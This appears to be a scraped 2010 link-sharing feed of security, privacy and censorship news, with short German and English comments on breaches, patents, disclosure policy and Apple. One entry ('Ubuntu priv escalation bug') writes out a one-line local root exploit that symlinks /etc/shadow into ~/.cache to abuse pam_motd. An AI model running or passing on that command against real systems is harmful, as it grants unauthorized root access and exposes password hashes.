schickt Backupbänder zum schreddern. Dort kommen sie nicht an. 800.000 Datensätze enthalten Social Security numbers, addresses, phone numbers, birth dates, health plan information, in addition to diagnoses and treatments, according to the 318-bed hospital. There also was some credit card and bank account information stored on the files. +</p>http://www.scmagazineus.com/hospital-files-with-personal-medical-data-on-800000-gone/article/174970/page_shots/2010/07/23/hospital-files-with-personal-medical-data-on-800.pnghospital-files-with-personal-medical-data-on-80011012010-07-23 23:32:405dataloss hospitalSouth African doctor invents anti-rape female condoms with teethSonnet Ehlers, a doctor in South Africa, has designed, patented, and manufactured an "anti-rape female condom" with the unambiguous brand name Rape-aXe. Women who believe they are at high risk of being raped insert the device into themselves like a tampon, and wear it around indefinitely as a form of protection when anticipating risk. The "teeth" inside cause intense pain and potential injury to a male upon penetration, and basically clamp down, making exit from the device painful. The thing does leave damage.<p>Sonnet Ehlers, a doctor in South Africa, has designed, patented, and manufactured an "anti-rape female condom" with the unambiguous brand name Rape-aXe. Women who believe they are at high risk of being raped insert the device into themselves like a tampon, and wear it around indefinitely as a form of protection when anticipating risk. The "teeth" inside cause intense pain and potential injury to a male upon penetration, and basically clamp down, making exit from the device painful. The thing does leave damage. +</p>http://www.boingboing.net/2010/07/22/south-african-doctor.htmlpage_shots/2010/07/23/south-african-doctor-invents-anti-rape-female.pngsouth-african-doctor-invents-anti-rape-female131012010-07-23 16:54:315freedom protectionAustralian government blocks out 90% of document on web-spying plansAustralia's web-censors have outdone themselves. After Stephen Conroy (the Australian minister notorious for proposing the Great Firewall of Australia) promised greater transparency in his government's efforts to regulate the Internet, they replied to a Freedom of Information request on plans to monitor Australians' internet traffic with a document that was 90 percent blacked out.<p>Australia's web-censors have outdone themselves. After Stephen Conroy (the Australian minister notorious for proposing the Great Firewall of Australia) promised greater transparency in his government's efforts to regulate the Internet, they replied to a Freedom of Information request on plans to monitor Australians' internet traffic with a document that was 90 percent blacked out. +</p>http://www.theage.com.au/technology/technology-news/no-minister-90-of-web-snoop-document-censored-to-stop--premature-unnecessary-debate-20100722-10mxo.htmlpage_shots/2010/07/23/australian-government-blocks-out-90-of-document-o.pngaustralian-government-blocks-out-90-of-document-o131012010-07-23 16:52:485australia, censorship, filter, foi, free speechiPhone : 15-Jähriger trickste Apple aus | Digital | ZEIT ONLINETyp hat in iPhone Handylight teathering als easter egg eingebaut.<p>Typ hat in iPhone Handylight teathering als easter egg eingebaut. +</p>http://www.zeit.de/digital/mobil/2010-07/handylight-appstore-tetheringpage_shots/2010/07/23/iphone-15-jahriger-trickste-apple-aus-digital.pngiphone-15-jahriger-trickste-apple-aus-digital11012010-07-23 01:20:045apple iphoneResponsible Disclosure ist jetzt Coordinated Vulnerability DisclosureMS erfindet ein neues Wort für Responsible Disclosure: Coordinated Vulnerability Disclosure - sonst ändert sich nix.<p>MS erfindet ein neues Wort für Responsible Disclosure: Coordinated Vulnerability Disclosure - sonst ändert sich nix. +</p>http://blogs.technet.com/b/msrc/archive/2010/07/22/announcing-coordinated-vulnerability-disclosure.aspxpage_shots/2010/07/22/no_page_shot.pngresponsible-disclosure-ist-jetzt-coordinated-vulne11012010-07-22 21:45:145fulldisclosureInternet erst ab 22 Uhr geoeffnetSendung über die franz. Revolution erst ab 22 Uhr abrufbar. m( WTF!<p>Sendung über die franz. Revolution erst ab 22 Uhr abrufbar. m( WTF! +</p>http://www.ardmediathek.de/ard/servlet/content/3517136?documentId=4970468page_shots/2010/07/22/internet-erst-ab-22-uhr-geoeffnet.pnginternet-erst-ab-22-uhr-geoeffnet11012010-07-22 18:56:455censorshipApple the new world leader in software insecurityApple now 1st in Software vulnerabilities. Even beats Oracle. MS 3rd<p>Apple now 1st in Software vulnerabilities. Even beats Oracle. MS 3rd +</p>http://arstechnica.com/security/news/2010/07/apple-the-new-world-leader-in-software-insecurity.arspage_shots/2010/07/22/apple-the-new-world-leader-in-software-insecurity.pngapple-the-new-world-leader-in-software-insecurity11012010-07-22 01:00:015vulnerabilityDell warns on spyware infected server motherboards • The RegisterDell liefert Motherboards mit Malware aus. pre0wned of the month award<p>Dell liefert Motherboards mit Malware aus. pre0wned of the month award +</p>http://www.theregister.co.uk/2010/07/21/dell_server_warning/page_shots/2010/07/22/dell-warns-on-spyware-infected-server-motherboards.pngdell-warns-on-spyware-infected-server-motherboards11012010-07-22 00:29:425pre0wnedGoogle Online Security Blog: Rebooting Responsible Disclosure: a focus on protecting end users60 Tage für responsible disclosure by Google. Für Chrome-Bugs gibt es jetzt 3133.7 USD.<p>60 Tage für responsible disclosure by Google. Für Chrome-Bugs gibt es jetzt 3133.7 USD. +</p>http://googleonlinesecurity.blogspot.com/2010/07/rebooting-responsible-disclosure-focus.htmlpage_shots/2010/07/21/google-online-security-blog-rebooting-responsible.pnggoogle-online-security-blog-rebooting-responsible11012010-07-21 22:43:165fulldisclosureHow a 15-yo Kid Tricked Apple With a Disguised iPhone Tethering Apphttp://gizmodo.com/5592521/how-a-guy-tricked-apple-with-a-disguised-iphone-tethering-app?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+gizmodo%2Ffull+%28Gizmodo%29page_shots/2010/07/21/how-a-15-yo-kid-tricked-apple-with-a-disguised-iph.pnghow-a-15-yo-kid-tricked-apple-with-a-disguised-iph141012010-07-21 18:35:585 De-Mail: Freund liest mit? : netzpolitik.orgde-fail scheint nicht ende-zu-ende zu verschlüsseln<p>de-fail scheint nicht ende-zu-ende zu verschlüsseln +</p>http://www.netzpolitik.org/2010/de-mail-freund-liest-mit/page_shots/2010/07/21/de-mail-freund-liest-mit-netzpolitikorg.pngde-mail-freund-liest-mit-netzpolitikorg11012010-07-21 15:31:085de-mailW-Lan-Erfassung: Apple nutzt iPhone-Besitzer als Umgebungsscanner - SPIEGEL ONLINE - Nachrichten - NetzweltApple scannt auch WLAN etc. und schickt die Daten heim<p>Apple scannt auch WLAN etc. und schickt die Daten heim +</p>http://www.spiegel.de/netzwelt/web/0,1518,707417,00.htmlpage_shots/2010/07/20/w-lan-erfassung-apple-nutzt-iphone-besitzer-als-u.pngw-lan-erfassung-apple-nutzt-iphone-besitzer-als-u11012010-07-20 18:29:555apple gsm wlanTelepolis pnews: Antiterrorgesetz dient britischen Kommunen zum Durchsuchen von MülltonnenMit anti-terror gesetz Mülltonnen durchschnüffelt<p>Mit anti-terror gesetz Mülltonnen durchschnüffelt +</p>http://www.heise.de/tp/blogs/8/148047page_shots/2010/07/20/telepolis-pnews-antiterrorgesetz-dient-britischen.pngtelepolis-pnews-antiterrorgesetz-dient-britischen11012010-07-20 17:59:565terror trashbin ukEU führt Open-Source-Projekte fortDie Europäische Union hat bekanntgegeben, mehrere ihrer Open-Source-Projekte in den nächsten Jahren fortsetzen zu wollen. Für Dienste wie OSOR.eu und SEMIC.eu sollen über 3,3 Millionen Euro bereitgestellt werden.<p>Die Europäische Union hat bekanntgegeben, mehrere ihrer Open-Source-Projekte in den nächsten Jahren fortsetzen zu wollen. Für Dienste wie OSOR.eu und SEMIC.eu sollen über 3,3 Millionen Euro bereitgestellt werden. +</p>http://www.pro-linux.de/news/1/15928/eu-fuehrt-open-source-projekte-fort.htmlpage_shots/2010/07/20/eu-fuhrt-open-source-projekte-fort.pngeu-fuhrt-open-source-projekte-fort131012010-07-20 09:28:205e-goverment, eu, linux, open sourceCCC | Forderungen für ein lebenswertes Netz http://ccc.de/de/updates/2010/forderungen-lebenswertes-netzpage_shots/2010/07/20/ccc-forderungen-fur-ein-lebenswertes-netz.pngccc-forderungen-fur-ein-lebenswertes-netz11012010-07-20 08:18:535ccc thesenNeue Trendsportart: Facebook als Datenbank benutzen.Bei dem Ministerium hatte sich ein Psychotherapeut gemeldet, der offenbar seine Patientendaten mit Facebook synchronisiert hat. Anschließend hätten sich seine Patienten gewundert, dass sie andere Patienten als Freundschaftsvorschläge von Facebook bekamen.<p>Bei dem Ministerium hatte sich ein Psychotherapeut gemeldet, der offenbar seine Patientendaten mit Facebook synchronisiert hat. Anschließend hätten sich seine Patienten gewundert, dass sie andere Patienten als Freundschaftsvorschläge von Facebook bekamen. +</p>http://blog.fefe.de/?ts=b2baf2bepage_shots/2010/07/19/neue-trendsportart-facebook-als-datenbank-benutze.pngneue-trendsportart-facebook-als-datenbank-benutze151012010-07-19 16:20:015D: Kriminalbeamte für Internet-Ausweispflicht - futurezone.ORF.atAusweispflicht im Internet, gefordert vom BDK m(<p>Ausweispflicht im Internet, gefordert vom BDK m( +</p>http://futurezone.orf.at/stories/1654127/page_shots/2010/07/17/d-kriminalbeamte-fur-internet-ausweispflicht-f.pngd-kriminalbeamte-fur-internet-ausweispflicht-f11012010-07-17 14:51:195bdk passportCyber-Spanner beobachtet Schülerinnen über deren Webcamshttp://www.heise.de/newsticker/meldung/Cyber-Spanner-beobachtet-Schuelerinnen-ueber-deren-Webcams-1039630.html/from/atom10page_shots/2010/07/16/cyber-spanner-beobachtet-schulerinnen-uber-deren-w.pngcyber-spanner-beobachtet-schulerinnen-uber-deren-w151012010-07-16 15:45:445DNSSEC in der DNS-Rootzone gestartethttp://www.heise.de/newsticker/meldung/DNSSEC-in-der-DNS-Rootzone-gestartet-1039401.htmlpage_shots/2010/07/16/dnssec-in-der-dns-rootzone-gestartet.pngdnssec-in-der-dns-rootzone-gestartet151012010-07-16 13:24:405 Droid X actually self-destructs if you try to mod it "If the eFuse fails to verify [the firmware information (what we call ROMS), the kernel information, and the bootloader version], then the eFuse receives a command to 'blow the fuse' or 'trip the fuse.' This results in the booting process becoming corrupted, followed by a permanent bricking of the phone. This FailSafe is activated anytime the bootloader is tampered with or any of the above three parts of the phone has been tampered with."<p>"If the eFuse fails to verify [the firmware information (what we call ROMS), the kernel information, and the bootloader version], then the eFuse receives a command to 'blow the fuse' or 'trip the fuse.' This results in the booting process becoming corrupted, followed by a permanent bricking of the phone. This FailSafe is activated anytime the bootloader is tampered with or any of the above three parts of the phone has been tampered with." +</p>http://www.mobilecrunch.com/2010/07/14/droid-x-actually-self-destructs-if-you-try-to-mod-it/page_shots/2010/07/15/droid-x-actually-self-destructs-if-you-try-to-mo.pngdroid-x-actually-self-destructs-if-you-try-to-mo11012010-07-15 22:08:095android motorolaChile becomes first country to guarantee net neutrality, we start thinking about moving -- EngadgetNet neutrality: you want it, we want it, ISPs pretty much hate it. Chilean politicians? Those guys love the stuff! The Board of the Chamber of Deputies voted almost unanimously to to pass Bulletin 4915 which, among other things, forces an ISP to: +...ensure access to all types of content, services or applications available on the network and offer a service that does not distinguish content, applications or services, based on the source of it or their property.<p>Net neutrality: you want it, we want it, ISPs pretty much hate it. Chilean politicians? Those guys love the stuff! The Board of the Chamber of Deputies voted almost unanimously to to pass Bulletin 4915 which, among other things, forces an ISP to: + ...ensure access to all types of content, services or applications available on the network and offer a service that does not distinguish content, applications or services, based on the source of it or their property. +</p>http://www.engadget.com/2010/07/15/chile-becomes-first-country-to-guarantee-net-neutrality-we-star/page_shots/2010/07/15/chile-becomes-first-country-to-guarantee-net-neutr.pngchile-becomes-first-country-to-guarantee-net-neutr11012010-07-15 21:52:445netneutralityDatenschutzprobleme bei DE-Mailsieben lesenswerte punkte, warum man die jetzt gestartete DE-Mail aus Datenschutzgründen boykottieren sollte<p>sieben lesenswerte punkte, warum man die jetzt gestartete DE-Mail aus Datenschutzgründen boykottieren sollte +</p>http://www.daten-speicherung.de/index.php/boykottiert-das-glaeserne-de-mail/page_shots/2010/07/15/datenschutzprobleme-bei-de-mail.pngdatenschutzprobleme-bei-de-mail151012010-07-15 13:47:465de-mailThousands of laptops stolen from US military contractor | Security Threats | ZDNet UKOver 3,000 laptops were stolen from a military contractor for the US Special Operations Command in March<p>Over 3,000 laptops were stolen from a military contractor for the US Special Operations Command in March +</p>http://www.zdnet.co.uk/news/security-threats/2010/07/14/thousands-of-laptops-stolen-from-us-military-contractor-40089534/page_shots/2010/07/15/thousands-of-laptops-stolen-from-us-military-contr.pngthousands-of-laptops-stolen-from-us-military-contr11012010-07-15 09:53:145militaryDaten-Speicherung.de &#8211; minimum data, maximum privacy &raquo; Boykottiert das gläserne De-Mail!Boykott DE-Mail, 10 Gründe dagagen.<p>Boykott DE-Mail, 10 Gründe dagagen. +</p>http://www.daten-speicherung.de/index.php/boykottiert-das-glaeserne-de-mail/page_shots/2010/07/14/daten-speicherungde-8211-minimum-data-maximum.pngdaten-speicherungde-8211-minimum-data-maximum11012010-07-14 23:08:045boycott de-mailBBC News - China Green Dam web filter teams 'face funding crisis'Green Dam S/W maker looses founding 'cause of failure.. In .de T Systems would have got more money.<p>Green Dam S/W maker looses founding 'cause of failure.. In .de T Systems would have got more money. +</p>http://news.bbc.co.uk/2/hi/world/asia_pacific/10614674.stmpage_shots/2010/07/13/bbc-news-china-green-dam-web-filter-teams-face.pngbbc-news-china-green-dam-web-filter-teams-face11012010-07-13 18:31:185censorship china filter greendamheise online - 15 Jahre &quot;.mp3&quot;15 Jahre MP3<p>15 Jahre MP3 +</p>http://www.heise.de/newsticker/meldung/15-Jahre-mp3-1037148.htmlpage_shots/2010/07/13/heise-online-15-jahre-quotmp3quot.pngheise-online-15-jahre-quotmp3quot11012010-07-13 16:28:105birthday mp3apple loescht KritikApple löscht Verweis auf US: Stiftung Warentest Bericht.<p>Apple löscht Verweis auf US: Stiftung Warentest Bericht. +</p>http://www.spiegel.de/netzwelt/web/0,1518,706189,00.htmlpage_shots/2010/07/13/apple-loescht-kritik.pngapple-loescht-kritik11012010-07-13 14:56:235apple iphoneMicrosoft seeks patent on ebook page flip • The RegisterPage flip patent for ebook readers m(<p>Page flip patent for ebook readers m( +</p>http://theregister.co.uk/2010/07/08/microsoft_virtual_page_turn_patent/page_shots/2010/07/10/microsoft-seeks-patent-on-ebook-page-flip-the-re.pngmicrosoft-seeks-patent-on-ebook-page-flip-the-re11012010-07-10 16:36:395microsoft patentDubai airports nix full-body scanners "out of respect for privacy of individuals and personal freedom"Full-body scanners will not be used in Dubai airports because the systems "contradict Islam, and out of respect for the privacy of individuals and their personal freedom," said the head of the Dubai police force airport security division, in a Dubai newspaper. Brigadier Pilot Ahmad Mohammad Bin Thani added, "The scanners will be replaced with other inspection systems that reserve travellers' privacy." <p>Full-body scanners will not be used in Dubai airports because the systems "contradict Islam, and out of respect for the privacy of individuals and their personal freedom," said the head of the Dubai police force airport security division, in a Dubai newspaper. Brigadier Pilot Ahmad Mohammad Bin Thani added, "The scanners will be replaced with other inspection systems that reserve travellers' privacy." +</p>http://timesofindia.indiatimes.com/world/middle-east/Body-scanners-will-not-be-used-at-Dubai-airports-Reports/articleshow/6134697.cmspage_shots/2010/07/10/dubai-airports-nix-full-body-scanners-out-of-resp.pngdubai-airports-nix-full-body-scanners-out-of-resp131012010-07-10 16:33:055nacktscanner privacyConsumer Group Sniffs Congresswoman&#8217;s Open Wi-Fi | Threat Level | Wired.comhttp://www.wired.com/threatlevel/2010/07/congresswoman-wifi-sniffed/page_shots/2010/07/10/consumer-group-sniffs-congresswoman8217s-open-w.pngconsumer-group-sniffs-congresswoman8217s-open-w11012010-07-10 09:36:295google wifiNetApp threatens Coraid over sales of open-source ZFS technology &mdash; EnterpriseStorageForum.comNetApp claims Patents on ZFS<p>NetApp claims Patents on ZFS +</p>http://www.enterprisestorageforum.com/storagenetworking/article.php/3891426/NetApp-threatens-Coraid-over-sales-of-open-source-ZFS-technology.htmpage_shots/2010/07/09/netapp-threatens-coraid-over-sales-of-open-source.pngnetapp-threatens-coraid-over-sales-of-open-source11012010-07-09 22:28:045netapp patent zfsNTP sues smartphone giants over wireless e-mail patentsNTP will nach Blackberry auch Google, Apple, HTC etc. an den Kragen für "delivery of electronic mail over wireless communications systems" Patent<p>NTP will nach Blackberry auch Google, Apple, HTC etc. an den Kragen für "delivery of electronic mail over wireless communications systems" Patent +</p>http://arstechnica.com/telecom/news/2010/07/ntp-chasing-smartphone-giants-over-wireless-e-mail-patents.arspage_shots/2010/07/09/ntp-sues-smartphone-giants-over-wireless-e-mail-pa.pngntp-sues-smartphone-giants-over-wireless-e-mail-pa11012010-07-09 22:22:025ntp patent wirelessSWIFT ist durchEuro MPs have approved a new deal to allow US anti-terror investigators to access Europeans' bank data.<p>Euro MPs have approved a new deal to allow US anti-terror investigators to access Europeans' bank data. +</p>http://news.bbc.co.uk/2/hi/world/europe/10552630.stmpage_shots/2010/07/09/swift-ist-durch.pngswift-ist-durch11012010-07-09 21:51:465swiftUH computer breach exposes personal data - Pacific Business News (Honolulu)10-jährige Datenhalde geplündert. Das ist das Problem bei diesem Ding. + +Some 53,000 people may have had their personal information exposed after a breach to the University of Hawaii computer system was discovered. + +The university released a statement Tuesday that more than 40,000 social security numbers and 200 credit card numbers were part of the exposed information that was housed on a computer server used by the Manoa campus parking office. + +UH Manoa faculty and staff members employed in 1998, and anyone who had business with the UH Manoa Parking Office between Jan. 1, 1998 and June 30, 2009.<p>10-jährige Datenhalde geplündert. Das ist das Problem bei diesem Ding. +</p> +<p>Some 53,000 people may have had their personal information exposed after a breach to the University of Hawaii computer system was discovered. +</p> +<p>The university released a statement Tuesday that more than 40,000 social security numbers and 200 credit card numbers were part of the exposed information that was housed on a computer server used by the Manoa campus parking office. +</p> +<p>UH Manoa faculty and staff members employed in 1998, and anyone who had business with the UH Manoa Parking Office between Jan. 1, 1998 and June 30, 2009. +</p>http://www.bizjournals.com/pacific/stories/2010/07/05/daily3.htmlpage_shots/2010/07/09/uh-computer-breach-exposes-personal-data-pacific.pnguh-computer-breach-exposes-personal-data-pacific11012010-07-09 21:51:005datalosskamera review in DresdenDie Überwacher können schon immer in die Wohnungen gucken.<p>Die Überwacher können schon immer in die Wohnungen gucken. +</p>http://www.addn.me/freiraeume/und-wer-kontrolliert-die-ueberwacher/page_shots/2010/07/09/alternative-dresden-news-add039n-raq_.pngalternative-dresden-news-add039n-raq11012010-07-09 17:03:095cctv observationiPhone on firefanboi burned his hand on antenna.<p>fanboi burned his hand on antenna. +</p>http://www.theinquirer.net/inquirer/news/1721684/iphone-catchespage_shots/2010/07/09/iphone-on-fire.pngiphone-on-fire11012010-07-09 15:59:075apple iphoneCisco looses attendee dbCisco looses attendee db for [CiscoLive](http://ciscolive2010.com) this year. Sends out message to lots of folks that did not register.<p>Cisco looses attendee db for <a href="http://ciscolive2010.com">CiscoLive</a> this year. Sends out message to lots of folks that did not register. +</p>http://www.networkworld.com/community/node/63432page_shots/2010/07/09/unknown-title002.pngunknown-title00211012010-07-08 23:46:585ciscoUbuntu priv escalation bugAll you need to get root on Ubuntu: +rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you'll own /etc/shadow)<p>All you need to get root on Ubuntu: + rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you'll own /etc/shadow) +</p>https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-July/001117.htmlpage_shots/2010/07/08/ubuntu-priv-escalation-bug.pngubuntu-priv-escalation-bug11012010-07-08 23:34:075ubuntu vulnerabilityheise online - The Pirate Bay: 4 Millionen Nutzerdatensätze abgegriffen4 Mio Userdatensätze bei Pirate Bay abgegriffen<p>4 Mio Userdatensätze bei Pirate Bay abgegriffen +</p>http://www.heise.de/newsticker/meldung/The-Pirate-Bay-4-Millionen-Nutzerdatensaetze-abgegriffen-1034933.htmlpage_shots/2010/07/08/heise-online-the-pirate-bay-4-millionen-nutzerd.pngheise-online-the-pirate-bay-4-millionen-nutzerd11012010-07-08 23:24:595dataloss piratebaydefault snmp community stringssnmp community names hard coded to public and private. OMFG!<p>snmp community names hard coded to public and private. OMFG! +</p>http://packetstormsecurity.org/filedesc/cisco-sa-20100707-snmp.txt.htmlpage_shots/2010/07/08/packet-storm-httppacketstormsecurity_.pngpacket-storm-httppacketstormsecurity11012010-07-08 08:08:015cisco snmp vulnerabilityGlocks stolen out of Israeli PM's bodyguard's luggage on American Airlines flightFour Glock 9mm pistols belonging to Israeli PM Benjamin Netanyahu's bodyguards are missing after American Airlines sent their suitcase to LA instead of DC. The luggage has been recovered, but the guns are missing and presumed stolen. Good thing the TSA doesn't let us lock them out of our suitcases, huh? <p>Four Glock 9mm pistols belonging to Israeli PM Benjamin Netanyahu's bodyguards are missing after American Airlines sent their suitcase to LA instead of DC. The luggage has been recovered, but the guns are missing and presumed stolen. Good thing the TSA doesn't let us lock them out of our suitcases, huh? +</p>http://news.bbc.co.uk/2/hi/world/us_and_canada/10536793.stmpage_shots/2010/07/07/glocks-stolen-out-of-israeli-pms-bodyguards-lugg.pngglocks-stolen-out-of-israeli-pms-bodyguards-lugg131012010-07-07 20:01:045israel politics security theater tsaEntity Crisis: Python + Wiimote + 30 tonnes of SteelBaggersteuerung mit 'ner WIImote + we decided... that we must add Wiimote control to our system! Yes, 15 tonne steel arms, giant claws and 200 bar of hydraulic pressure... all controlled with a flick of the wrist.<p>Baggersteuerung mit 'ner WIImote + we decided... that we must add Wiimote control to our system! Yes, 15 tonne steel arms, giant claws and 200 bar of hydraulic pressure... all controlled with a flick of the wrist. +</p>http://entitycrisis.blogspot.com/2009/07/python-wiimote-30-tonnes-of-steel.htmlpage_shots/2010/07/07/entity-crisis-python-wiimote-30-tonnes-of-st.pngentity-crisis-python-wiimote-30-tonnes-of-st11012010-07-07 16:25:105robot wiiZwei Bildschirme: Amazon bekommt Patent auf E-Book-Reader - Golem.deE-Book reader patent! WTF, also mit 2 Displays. Finally, computers are patented.<p>E-Book reader patent! WTF, also mit 2 Displays. Finally, computers are patented. +</p>http://www.golem.de/1007/76288.htmlpage_shots/2010/07/07/zwei-bildschirme-amazon-bekommt-patent-auf-e-book_.pngzwei-bildschirme-amazon-bekommt-patent-auf-e-book11012010-07-07 14:20:125amazon patentTSA blocks "controversial opinion" from its internal networkThe US Transport Security Agency has joined with other defenders of liberty, such as the governments of Iran and Syria, and has added a censorwall to its network that blocks "controversial opinion." Apparently the TSA's crack operatives are impressionable, easily gulled types who are at danger of becoming jihadis, polys, or possibly even liberals if they are exposed to "controversy."<p>The US Transport Security Agency has joined with other defenders of liberty, such as the governments of Iran and Syria, and has added a censorwall to its network that blocks "controversial opinion." Apparently the TSA's crack operatives are impressionable, easily gulled types who are at danger of becoming jihadis, polys, or possibly even liberals if they are exposed to "controversy." +</p>http://www.cbsnews.com/8301-31727_162-20009642-10391695.htmlpage_shots/2010/07/07/tsa-blocks-controversial-opinion-from-its-intern.pngtsa-blocks-controversial-opinion-from-its-intern131012010-07-07 12:56:335censorship, free speech, tsaIran declares war on mullets, ponytails for men; approves of hair gel and Elvis 'dosIran's ministry of culture has released a catalog of government-approved hair styles, in an effort to eliminate the menace of "decadent Western cuts." According to the Islamic Republic News Agency, forbidden 'dos include ponytails, mullets and spiky hair. But styles resembling those of Elvis Presley, Simon Cowell, or eighties-era floppy fringes are totally fine. Also, hair gel in moderation is acceptable. With the exception of goatees, facial hair is frowned upon.<p>Iran's ministry of culture has released a catalog of government-approved hair styles, in an effort to eliminate the menace of "decadent Western cuts." According to the Islamic Republic News Agency, forbidden 'dos include ponytails, mullets and spiky hair. But styles resembling those of Elvis Presley, Simon Cowell, or eighties-era floppy fringes are totally fine. Also, hair gel in moderation is acceptable. With the exception of goatees, facial hair is frowned upon. +</p>http://www.france24.com/en/20100705-ponytail-men-gets-chop-iranpage_shots/2010/07/07/iran-declares-war-on-mullets-ponytails-for-men-a.pngiran-declares-war-on-mullets-ponytails-for-men-a131012010-07-07 12:54:185censorship iranW00t! sends Associated Press a bill for quoting its blogWhen W00t! posted its delightful notice about being acquired by Amazon, it was picked up and re-run by blogs all over the net. Not wanting to miss out on the action, the Associated Press ran the story and the text, too. +One problem: the AP has previously told bloggers that quotations -- however brief -- should be licensed before publication. They even offer these licenses. For a small fee, AP will generously allow you to quote one of its articles on your blog (provided that you don't do so in a way that criticizes the AP, of course, and they reserve the right to take the quote back at any time). +So W00t! sent the AP a bill for $17.50 for the quotation.<p>When W00t! posted its delightful notice about being acquired by Amazon, it was picked up and re-run by blogs all over the net. Not wanting to miss out on the action, the Associated Press ran the story and the text, too. + One problem: the AP has previously told bloggers that quotations -- however brief -- should be licensed before publication. They even offer these licenses. For a small fee, AP will generously allow you to quote one of its articles on your blog (provided that you don't do so in a way that criticizes the AP, of course, and they reserve the right to take the quote back at any time). + So W00t! sent the AP a bill for $17.50 for the quotation. +</p>http://consumerist.com/2010/07/woot-to-ap-you-owe-us-1750-for-copying-our-content.htmlpage_shots/2010/07/07/w00t-sends-associated-press-a-bill-for-quoting-it_.pngw00t-sends-associated-press-a-bill-for-quoting-it131012010-07-07 12:52:445copyfight, copyright, digital media, leistungsschutzrecht, urheberrechtsabgabeUS will press criminal charges against Manning, alleged Wikileaks sourceThe U.S. military has announced that it will press criminal charges against 22 year old Pfc. Bradley E. Manning for allegedly transferring classified military information to his personal computer, "wrongfully adding unauthorized software to a Secret Internet Protocol Router network computer," obtaining "more than 150,000 classified U.S. State Department cables," and transmitting data to unauthorized persons. Possible penalties: Manning faces up to 52 years in prison.<p>The U.S. military has announced that it will press criminal charges against 22 year old Pfc. Bradley E. Manning for allegedly transferring classified military information to his personal computer, "wrongfully adding unauthorized software to a Secret Internet Protocol Router network computer," obtaining "more than 150,000 classified U.S. State Department cables," and transmitting data to unauthorized persons. Possible penalties: Manning faces up to 52 years in prison. +</p>http://www.boingboing.net/2010/07/06/us-will-press-crimin.htmlpage_shots/2010/07/07/us-will-press-criminal-charges-against-manning-al_.pngus-will-press-criminal-charges-against-manning-al131012010-07-07 12:49:175censorship crime democracy privacy whistleblowing wikileaksMicrosoft Spurned Researcher Collective foundedFull disclosure revival: + +Updated Security researchers irked by how Microsoft responded to Google engineer Tavis Ormany's public disclosure of a zero-day Windows XP Help Center security bug have banded together to form a group called the Microsoft Spurned Researcher Collective*. + +The group is forming a "union" in the belief that together they will be better placed to handle flak from Redmond and elsewhere following the publication of security flaws<p>Full disclosure revival: +</p> +<p>Updated Security researchers irked by how Microsoft responded to Google engineer Tavis Ormany's public disclosure of a zero-day Windows XP Help Center security bug have banded together to form a group called the Microsoft Spurned Researcher Collective*. +</p> +<p>The group is forming a "union" in the belief that together they will be better placed to handle flak from Redmond and elsewhere following the publication of security flaws +</p>http://www.theregister.co.uk/2010/07/06/ms_spurned_research_collective/page_shots/2010/07/06/microsoft-spurned-researcher-collective-founded.pngmicrosoft-spurned-researcher-collective-founded11012010-07-06 19:39:325fulldisclosure microsoftiPad Flash hack spotted in the wild | TG DailyFlash hacked into iOS (the one of Apple)<p>Flash hacked into iOS (the one of Apple) +</p>http://www.tgdaily.com/mobility-features/50504-ipad-flash-hack-spotted-in-the-wildpage_shots/2010/07/06/ipad-flash-hack-spotted-in-the-wild-tg-daily.pngipad-flash-hack-spotted-in-the-wild-tg-daily11012010-07-06 10:34:535apple flash iphoneOnline tax scam gang get 40 years • The RegisterUkrainer haben 1600 Fake-IDs angelegt um Steuern zurückzufordern. 40 Jahre Knast.<p>Ukrainer haben 1600 Fake-IDs angelegt um Steuern zurückzufordern. 40 Jahre Knast. +</p>http://www.theregister.co.uk/2010/07/05/tax_scam_rebate/page_shots/2010/07/06/online-tax-scam-gang-get-40-years-the-register.pngonline-tax-scam-gang-get-40-years-the-register11012010-07-06 10:33:545scamAnother Apple iPhone 4 Flaw: A Glitchy Proximity Sensor - PCWorldAnother "glitch" of Mr. Perfect's new toy.<p>Another "glitch" of Mr. Perfect's new toy. +</p>http://www.pcworld.com/article/200024/another_apple_iphone_4_flaw_a_glitchy_proximity_sensor.htmlpage_shots/2010/07/06/another-apple-iphone-4-flaw-a-glitchy-proximity-s.pnganother-apple-iphone-4-flaw-a-glitchy-proximity-s11012010-07-06 10:15:155apple iphoneHacker forced to cancel HiTB presentation due to legal threats by ATM vendors - ByteMods.comSecurity by Obscurity always worked. Ha ha har<p>Security by Obscurity always worked. Ha ha har +</p>http://www.bytemods.com/news/201/hacker-forced-to-cancel-hitb-presentation-due-to-legal-threats-by-atm-vendorspage_shots/2010/07/04/hacker-forced-to-cancel-hitb-presentation-due-to-l.pnghacker-forced-to-cancel-hitb-presentation-due-to-l11012010-07-04 18:36:285legalApp Store, Hacked. (Updated)Mal gucken ob das stimmt. Angeblich Ranking im App-Store gepusht und iTunes Accounts gehackt. + +[Typ ist raus geflogen](http://www.pcworld.com/businesscenter/article/200503/apps_disappear_from_app_store_amid_hacking_complaints.html)<p>Mal gucken ob das stimmt. Angeblich Ranking im App-Store gepusht und iTunes Accounts gehackt. +</p> +<p><a href="http://www.pcworld.com/businesscenter/article/200503/apps_disappear_from_app_store_amid_hacking_complaints.html">Typ ist raus geflogen</a> +</p>http://thenextweb.com/apple/2010/07/04/app-store-hacked/page_shots/2010/07/06/app-store-hacked-updated_.pngapp-store-hacked-updated11012010-07-04 18:28:365apple itunesZGeek - We put the "M" in stupid - Comedy Central censors Futurama's jab at AppleLast night's episode took aim at discarded technology being dumped in third-world countries, Twitter, and our favorite company Apple. It was brilliant satire and it's refreshing to have that voice on TV again. + +During the broadcast, as the zombies entered the Mom store there is voiceover from the Mom character that is met with cheers from the crowd. She says, "Introducing the all new eyePhone 2.0." + +In the online clip from the show, the dialogue is missing. Instead the zombies just began cheering, money in hand for no apparent reason. <p>Last night's episode took aim at discarded technology being dumped in third-world countries, Twitter, and our favorite company Apple. It was brilliant satire and it's refreshing to have that voice on TV again. +</p> +<p>During the broadcast, as the zombies entered the Mom store there is voiceover from the Mom character that is met with cheers from the crowd. She says, "Introducing the all new eyePhone 2.0." +</p> +<p>In the online clip from the show, the dialogue is missing. Instead the zombies just began cheering, money in hand for no apparent reason. 